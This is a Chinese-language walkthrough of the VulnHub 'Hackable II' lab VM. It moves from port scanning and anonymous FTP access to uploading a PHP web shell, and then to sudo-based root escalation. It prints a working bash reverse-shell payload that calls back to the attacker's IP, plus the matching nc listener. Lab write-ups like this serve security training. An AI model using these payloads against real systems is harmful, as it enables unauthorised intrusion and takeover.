滲透環境
攻擊機: IP: 192.168.216.129(Kali)
靶機: IP:192.168.216.131
靶機下載地址:https://www.vulnhub.com/entry/hackable-ii,711/
進行滲透
一、 獲取埠資訊
該虛擬機器匯入VMware需要在拯救模式中重新配置一下網路卡名稱,附上教程,不再贅述:https://blog.csdn.net/liver100day/article/details/119109320
進行埠掃描
nmap -O -sV -p- -A 192.168.216.131
掃描WEB目錄
開啟CALL.html,沒有什麼發現
嘗試使用nmap掃描FTP服務,看是否允許匿名登入
nmap --script ftp-anon 192.168.216.131
掃描結果表明該主機的FTP服務允許匿名登入,且匿名使用者能夠訪問至少一個檔案(
CALL.html)
登入FTP服務,使用者名稱為anonymous,密碼不用輸入(直接敲回車)
二、 尋找WEB漏洞
檢視檔案,並下載CALL.html
dir
get CALL.html
下載後瀏覽CALL.html原始碼並未發現有用資訊
嘗試上傳檔案,在攻擊機當前路徑下寫檔案test.php,內容如下:
<?=phpinfo();?>
透過FTP上傳到目標機器
put test.php
上傳成功,且在/files/下可以看到該檔案,訪問該檔案,發現可以成功解析
接下來的思路就比較清晰了,寫一個PHP檔案,觸發時讓目標機器反向連線我們的攻擊機來反彈shell。
寫trojan.php,內容如下:
<?php system("bash -c 'bash -i >& /dev/tcp/192.168.216.129/4444 0>&1'");?>
將其上傳
put trojan.php
攻擊機啟動監聽
nc -nlvp 4444
瀏覽器訪問trojan.php,觸發木馬進行反向連線
成功反彈shell
三、 提權
接下來進入/home目錄,可以看到一個shrek使用者,另外還有一個important.txt
讀取important.txt
提示我們執行/.runme.sh
後面的字串顯然是經過md5運算的,我們使用線上md5破解網站進行解碼,得到密碼:onion
建立互動式shell,切換到使用者shrek
python3 -c 'import pty;pty.spawn("/bin/bash")'
su shrek
常規思路,檢視一下具有SUID許可權的檔案
find / -perm -u=s -type f 2>/dev/null
沒有什麼發現
檢視shrek使用者可執行的特權命令
sudo -l
寫一個py檔案root.py,內容如下:
echo 'import pty;pty.spawn("/bin/bash")' > root.py
該檔案的作用就是開啟一個互動式的shell
接下來執行
sudo /usr/bin/python3.5 /home/shrek/root.py
這裡建議都使用絕對路徑,相對路徑有時無法成功執行。
這樣就用root的身份登入了shell,滲透結束。